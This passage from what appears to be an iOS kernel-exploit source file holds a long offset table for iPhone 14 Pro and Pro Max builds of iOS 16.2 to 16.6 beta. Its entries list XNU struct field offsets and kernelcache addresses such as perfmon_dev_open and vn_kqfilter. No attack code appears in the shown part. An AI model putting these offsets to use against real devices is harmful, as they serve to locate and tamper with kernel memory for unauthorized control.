.kernelcache__vm_page_array_ending_addr = 0xfffffff00a5b8908, .kernelcache__vn_kqfilter = 0xfffffff007f820b8, }, // End iPhone SE 3rd // // End iPhone 14, iPhone 14 Plus, iPhone 13 Pro, iPhone 13 Pro Max, iPhone 13 Mini, iPhone SE 3rd series // // Start iPhone 14 Pro, iPhone 14 Pro Max series // // Start iPhone 14 Pro // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:09:56 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8120", .build_version = "20C65", .device_id = "iPhone15,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a321190, .kernelcache__gPhysBase = 0xfffffff007853fd8, .kernelcache__gPhysSize = 0xfffffff007853fd8 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078521b8, .kernelcache__perfmon_devices = 0xfffffff00a35c390, .kernelcache__perfmon_dev_open = 0xfffffff007ecce7c, .kernelcache__ptov_table = 0xfffffff0078073d0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a35b800, .kernelcache__vm_pages = 0xfffffff007804090, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806390, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a35b7f8, .kernelcache__vn_kqfilter = 0xfffffff007f1cea4, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:01 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8120", .build_version = "20D47", .device_id = "iPhone15,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a32d190, .kernelcache__gPhysBase = 0xfffffff0078540c0, .kernelcache__gPhysSize = 0xfffffff0078540c0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078522a0, .kernelcache__perfmon_devices = 0xfffffff00a368390, .kernelcache__perfmon_dev_open = 0xfffffff007ecce10, .kernelcache__ptov_table = 0xfffffff007807410, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a367800, .kernelcache__vm_pages = 0xfffffff0078040d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078063d0, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3677f8, .kernelcache__vn_kqfilter = 0xfffffff007f1ce28, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:01 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8120", .build_version = "20D67", .device_id = "iPhone15,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a32d190, .kernelcache__gPhysBase = 0xfffffff0078540c0, .kernelcache__gPhysSize = 0xfffffff0078540c0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078522a0, .kernelcache__perfmon_devices = 0xfffffff00a368390, .kernelcache__perfmon_dev_open = 0xfffffff007ecce10, .kernelcache__ptov_table = 0xfffffff007807410, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a367800, .kernelcache__vm_pages = 0xfffffff0078040d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078063d0, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3677f8, .kernelcache__vn_kqfilter = 0xfffffff007f1ce28, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:19 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8120", .build_version = "20E247", .device_id = "iPhone15,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a411208, .kernelcache__gPhysBase = 0xfffffff007933ed0, .kernelcache__gPhysSize = 0xfffffff007933ed0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079320a8, .kernelcache__perfmon_devices = 0xfffffff00a44f500, .kernelcache__perfmon_dev_open = 0xfffffff007eecd3c, .kernelcache__ptov_table = 0xfffffff0078e7178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a44e990, .kernelcache__vm_pages = 0xfffffff0078e3eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a44e988, .kernelcache__vn_kqfilter = 0xfffffff007f3960c, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:19 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8120", .build_version = "20E252", .device_id = "iPhone15,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a411208, .kernelcache__gPhysBase = 0xfffffff007933ed0, .kernelcache__gPhysSize = 0xfffffff007933ed0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079320a8, .kernelcache__perfmon_devices = 0xfffffff00a44f500, .kernelcache__perfmon_dev_open = 0xfffffff007eecd3c, .kernelcache__ptov_table = 0xfffffff0078e7178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a44e990, .kernelcache__vm_pages = 0xfffffff0078e3eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a44e988, .kernelcache__vn_kqfilter = 0xfffffff007f3960c, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:09:28 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8120", .build_version = "20F66", .device_id = "iPhone15,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419208, .kernelcache__gPhysBase = 0xfffffff007934010, .kernelcache__gPhysSize = 0xfffffff007934010 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079321e8, .kernelcache__perfmon_devices = 0xfffffff00a457500, .kernelcache__perfmon_dev_open = 0xfffffff007eecfc0, .kernelcache__ptov_table = 0xfffffff0078e7178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a456990, .kernelcache__vm_pages = 0xfffffff0078e3eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a456988, .kernelcache__vn_kqfilter = 0xfffffff007f39b28, }, // iOS 16.6 Beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:35 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8120", .build_version = "20G5026e", .device_id = "iPhone15,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a4c9a30, .kernelcache__gPhysBase = 0xfffffff00794c1b8, .kernelcache__gPhysSize = 0xfffffff00794c1b8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794a370, .kernelcache__perfmon_devices = 0xfffffff00a509530, .kernelcache__perfmon_dev_open = 0xfffffff007f116dc, .kernelcache__ptov_table = 0xfffffff0078ff9b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a508910, .kernelcache__vm_pages = 0xfffffff0078fc108, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078fe968, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a508908, .kernelcache__vn_kqfilter = 0xfffffff007f5dbf8, }, // End iPhone 14 Pro // // Start iPhone 14 Pro Max // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:09:56 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8120", .build_version = "20C65", .device_id = "iPhone15,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a321190, .kernelcache__gPhysBase = 0xfffffff007853fd8, .kernelcache__gPhysSize = 0xfffffff007853fd8 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078521b8, .kernelcache__perfmon_devices = 0xfffffff00a35c390, .kernelcache__perfmon_dev_open = 0xfffffff007ecce7c, .kernelcache__ptov_table = 0xfffffff0078073d0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a35b800, .kernelcache__vm_pages = 0xfffffff007804090, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806390, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a35b7f8, .kernelcache__vn_kqfilter = 0xfffffff007f1cea4, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:01 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8120", .build_version = "20D47", .device_id = "iPhone15,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, 